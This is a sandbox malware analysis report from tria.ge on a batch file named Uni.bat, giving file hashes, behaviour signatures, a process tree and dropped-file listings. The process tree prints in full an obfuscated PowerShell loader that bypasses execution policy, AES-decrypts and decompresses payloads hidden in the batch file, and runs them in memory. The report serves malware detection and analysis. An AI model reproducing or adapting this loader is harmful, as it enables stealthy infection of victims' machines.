Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    16s
  • max time network
    21s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    15/07/2023, 14:29

General

  • Target

    Uni.bat

  • Size

    12.7MB

  • MD5

    be62b93f5d396c3e0170e242524dd028

  • SHA1

    99e4790126a772af2f29e065c1aef6063e8e12b8

  • SHA256

    d6437638c72a39b34562e272d2e61f8f1408d50a0230341a7bacb675ca30c72f

  • SHA512

    6705287c045c5c0991e528006798d8c26b8e69abe0250a87e1d24c1dea7c18d1e570d7b9b604a1546d50519fc2cf41e418c417b10310a38e0da0c53db32272bb

  • SSDEEP

    49152:Z5irCQcDQZMpqSIvIS/Pb3M171APKQbmVROCoGnquAwJYdbgwk654lp0IZXApwFU:w

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4000
      • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
        "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AhdqY($Soqyo){ $GMrUJ=[System.Security.Cryptography.Aes]::Create(); $GMrUJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GMrUJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GMrUJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('n6ZNlJxqzpQ1XRiG2tuu1JmoHxwJc3mli81U2A8nQ9k='); $GMrUJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYZLgisbwIsxFzm0XsH2pQ=='); $sxZZG=$GMrUJ.CreateDecryptor(); $return_var=$sxZZG.TransformFinalBlock($Soqyo, 0, $Soqyo.Length); $sxZZG.Dispose(); $GMrUJ.Dispose(); $return_var;}function FhGev($Soqyo){ $lTYrn=New-Object System.IO.MemoryStream(,$Soqyo); $jNRyy=New-Object System.IO.MemoryStream; $CbFKP=New-Object System.IO.Compression.GZipStream($lTYrn, [IO.Compression.CompressionMode]::Decompress); $CbFKP.CopyTo($jNRyy); $CbFKP.Dispose(); $lTYrn.Dispose(); $jNRyy.Dispose(); $jNRyy.ToArray();}function CQPwX($Soqyo,$GqVhs){ $nPHkC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$Soqyo); $JxPGs=$nPHkC.EntryPoint; $JxPGs.Invoke($null, $GqVhs);}$EFkiG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($eFXlV in $EFkiG) { if ($eFXlV.StartsWith('SEROXEN')) { $dpUOE=$eFXlV.Substring(7); break; }}$OdrYv=[string[]]$dpUOE.Split('\');$UxsjS=FhGev (AhdqY ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OdrYv[0])));$mgxsE=FhGev (AhdqY ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OdrYv[1])));CQPwX $mgxsE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));CQPwX $UxsjS (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4508

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pguvt5j.rpi.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4508-139-0x000002601C900000-0x000002601C982000-memory.dmp

      Filesize

      520KB

    • memory/4508-145-0x000002601C8D0000-0x000002601C8F2000-memory.dmp

      Filesize

      136KB

    • memory/4508-150-0x0000026002580000-0x0000026002590000-memory.dmp

      Filesize

      64KB

    • memory/4508-151-0x00007FFB3E460000-0x00007FFB3EF21000-memory.dmp

      Filesize

      10.8MB

    • memory/4508-152-0x000002601A7F0000-0x000002601A800000-memory.dmp

      Filesize

      64KB

    • memory/4508-153-0x000002601CAA0000-0x000002601CBA2000-memory.dmp

      Filesize

      1.0MB

    • memory/4508-154-0x000002601A7F0000-0x000002601A800000-memory.dmp

      Filesize

      64KB